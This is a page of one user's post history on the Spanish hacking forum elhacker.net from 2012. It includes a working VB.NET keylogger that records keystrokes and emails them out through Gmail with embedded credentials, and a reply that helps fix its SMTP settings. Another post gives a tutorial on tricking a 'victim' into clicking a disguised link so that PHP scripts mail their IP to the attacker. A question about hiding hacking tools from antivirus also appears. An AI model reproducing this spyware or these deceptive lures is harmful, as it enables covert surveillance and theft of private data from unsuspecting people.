elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 ... 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 [122] 123 124 125 126 127 128 129 130 131 132 133
1211  Programación / .NET (C#, VB.NET, ASP) / Re: Keylogger Remoto Mail en: 18 Octubre 2012, 22:11 pm
Simplemente no envia el correo porque asignaste el puerto equivocado a la instancia de la clase SmtpClient(). Si estás usando SSL tendrás que utilizar el puerto 465, si utilizas TLS tendras que utilizar el puerto que introduciste el programa (587). Échale un vistazo a esto -> http://support.google.com/mail/bin/answer.py?hl=es&answer=13287.

Ahora, a ese codigo le meteria mano jejej... ¿No podrias instanciar una sola vez la clase SmtpClient y llenarla con las credenciales de tu correo para no tener que hacerlo n veces dentro del timer?. Estás diciendo a la clase que utilize SSL dos veces ...
Además, esto solo capturaria ciertas pulsaciones del teclado y es un método ya no muy empleado. Si lo que deseeas es codear un buen Keylogger lee sobre Hooks. En este foro tienes un post mío con explicaciones y ejemplos de como utilizarlos.

Saludos!

Lleva 2 Timers

Timer 1 - Interval 2
Timer 2 - Interval 30000
1212  Programación / .NET (C#, VB.NET, ASP) / Keylogger Remoto Mail en: 18 Octubre 2012, 15:40 pm
Bueno intente crear un keylogger pero nose porque no me anda bien  :o directamente que no envía la información al Gmail les dejo el código por si pueden hecharme una mano.

Código:
Imports System.Web
Imports System.IO
Imports System.Net.Mail

Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0

result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
End Sub
Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
Dim mail As New MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("universalprjct@gm ail.com", "furryman")
SmtpServer.Port = 587
SmtpServer.Host = "smtp.gmail.com"

SmtpServer.EnableSsl = True
SmtpServer.EnableSsl = True
mail.To.Add("PON AKI TU CUENTA DE GMAIL")
mail.From = New MailAddress("username@gmail.com")
mail.Subject = "Universal Keylogger"
mail.Body = TextBox1.Text
SmtpServer.Send(mail)
End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
End
End Sub
End Class

TeCo
Admin

Mensajes: 33
Fecha de inscripción: 08/12/2010

 
1213  Seguridad Informática / Seguridad / Como hago para que mi antivirus no me detecte Hacking Tools en: 14 Octubre 2012, 10:55 am
Pues siempre me los detecta y no es cuestión de tenerlo desactivado.

Antivirus: Windows Security Essentials
1214  Foros Generales / Dudas Generales / ¿Como hago esto? Agenda en: 9 Octubre 2012, 16:16 pm
Bueno tengo que crear una agenda para el instituto para una aplicacion de movil tengo las imágenes y eso.. donde escribir pero commo hago para escribir en la imágen justo en las lineaas
1215  Comunicaciones / Redes / Re: jugar al poker en: 28 Septiembre 2012, 22:37 pm
Alomejor no estoy seguro eeeh con ciber ghots vpn cambias tu ip con la de otro país...
1216  Foros Generales / Foro Libre / Re: Fallo brutal en Tuenti en: 26 Septiembre 2012, 18:48 pm
Un amigo mío, quito internet por una semana y toda esa semana la cuenta aperecía conectada cuando no lo estaba.
1217  Seguridad Informática / Hacking / Maneras de obtener Ip en: 21 Septiembre 2012, 17:11 pm
Este post se lo dedico a --kilian-- que dice que no googleo  :P bueno encontre esto por google exactamente en taringa y quiero que añadan las formas que faltan para obtener la ip de una victima.


1º-primera forma:

Cuando te llega un email a tu correo y quieres saber la IP, tienes que ver el Header (o encabezado) del email. entrando a la sección de opciones luego a configuración de pantalla de correo, y luego a encabezados de mensaje allí eliges avanzado y oprimes aceptar. Después de esto entra a tu bandeja de entrada y mira el correo que tu víctima te envió y te aparecerá algo así:


MIME-Versión: 1.0
X-Originating-IP: [212.97.184.132] <-Esta es la IP
Received: from [207.46.181.14] by hotmail.com (3.2) with ESMTP id MHotMailBEB7DEE9009E40042141CF2EB50E0C9A11; Fri, 24 jul 2003 1
Received: from hotmail.com ([207.68.163.7])


Este método no es muy preciso, en algunas ocasiones muestra una IP que no corresponde a la persona que te envío el correo, debido al tipo de conexión de Internet que utiliza o que se encuentra en una red LAN y por lo tanto vemos es la IP global del servidor.

2º-segunda forma:

_consiste en decirle a la víctima que entre a esta dirección de Internet ya sea por el MSN o enviándole el link por correo. Reemplaza la dirección tuemail@hotmail.com con tu email.


http://ontargetpage.bizhat.com/h.php?user=tuemail@hotmail.com


Dile que es una pagina de animaciones de HappyTreeFriends en donde eres socio. A los pocos segundos que la persona le de clic a la dirección recibirás un email con su direccion IP, si el mensaje no te llega es porque tienes el filtro de correo no deseado desactivado o en un nivel alto o exclusivo, para solucionar este problema debes ir a las opciones de hotmail y en la sección de correo no deseado coloca el filtro en un nivel predeterminado ("bajo" anda a la perfeccion). Este método no funciona para averiguar la IP de los computadores que se encuentran dentro de una red LAN pues solo te va aparecer la IP del servidor o computador central.



3º-tercera forma
ip search:a este programita, le hacemos click en el boton "http:" y le damos click en iniciar, luego tenemos q mandarle a la victima una pag con la sig forma: http://tuip
ej http://200.32.23.1
y si hace click, nos aparece su ip en el programilla, y a la victima le aparece una pagina que esta en construccion...
pero nadie quiere mandarle su propia ip a la victima no?
bueno entonces, nos hacemos un dominio no-ip (buscar en el foro como se hace)
ej:
www.loqueseteocurra.no-ip.com y se la mandamos a la victima,
seria asi: http://www.loqueseteocurra.no-ip.com (mientras el programa esta activado obviamente), y si hace click, listo su ip aparecera en el programa
esta si es mas discreta y funciona de la misma manera

4º-4forma:
tcp view: esto es lo mismo que el famoso comando netsat, nada mas que mas grafico, y tiene una opcion de "ver conexiones activas" lo bueno es que si son del msn, aparece un icono del msn, (debe estar transfiriendose un archivo
tambien muy bueno para saber si tenemos un programilla conectado a nosotros...

5º-5forma:

private ip: cuando estes transfiriendo un archivo por msn con tu victima, haces click en sacar ip, (la ventana principal debe ser la de tu victima

6º-6forma:

les mostrare como hacer para que envie la IP de una persona a tu cuenta de email, sin importar que servidor tengas .


lo primero que haremos sera agarrar nuestro editor de textos y escribiremos lo siguiente:


CODE:

Código:
<?php 

function getIP() {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
elseif (isset($_SERVER['HTTP_VIA'])) {
$ip = $_SERVER['HTTP_VIA'];
}
elseif (isset($_SERVER['REMOTE_ADDR'])) {
$ip = $_SERVER['REMOTE_ADDR'];
}
else {
$ip = "unknown";
}
$nuestrocorreo = "tucorreo@servidor.com";
$asunto = "LA IP DE TU VICTIMA";
$comentario = "aca esta la IP de la persona que le pasaste la pagina";
mail ($nuestrocorreo, $asunto, $comentario, $ip);
}

?>


esto lo guardamos como ip.php

ahora nos conseguiremos una cuenta en cualquier servidor gratuito que tenga la posibilidad de leer archivos con extension .php

ahora crearemos una pagina web ( no tan compleja ) de la siguiente forma


CODE:


Código:
<?php 
echo 'MI pagina web, ';
echo ' te gusta?';
include("ip.php"; getIP();
?> //the script is powered by codex, a developer since 2001

o este

<?
$ip=$REMOTE_ADDR;
$hr=
mail("aqui_tu_correo@etc.com","Ip","$ip";
?>

Fuente: Taringa.net
1218  Comunicaciones / Mensajería / Re: Recuperar Hotmail? en: 19 Septiembre 2012, 16:05 pm
 :silbar: quien sabe, bueno entonces no se puede no?
1219  Comunicaciones / Mensajería / Re: Recuperar Hotmail? en: 17 Septiembre 2012, 20:24 pm
Hace ya 3 años?? pff, creo recordar que hotmail cancela las cuentas que no se usan al pasar mucho tiempo..y no se porque lo pones en hacking básico..es tuya la cuenta?



Si, la tenñia recordada en la casa de un amigo y le metieron eun keylogger y a tomar .l. ayer mismo prove dandole a olvidar contraseña y nada... me dijieron que verificarían los datos y me lo dirian pero nada.
1220  Comunicaciones / Mensajería / Recuperar Hotmail? en: 17 Septiembre 2012, 16:09 pm
Hace ya 3 años me quitaron un hotmail y tenia una cuenta de un juego vinculada hay y una niña que estaba pff y quiero recuperarlo que podría hacer, nadie se conecta en ese mail :-/ y lo de olvide ocntraseña cambiaron los datos que puse en un principio.
Páginas: 1 ... 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 [122] 123 124 125 126 127 128 129 130 131 132 133
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines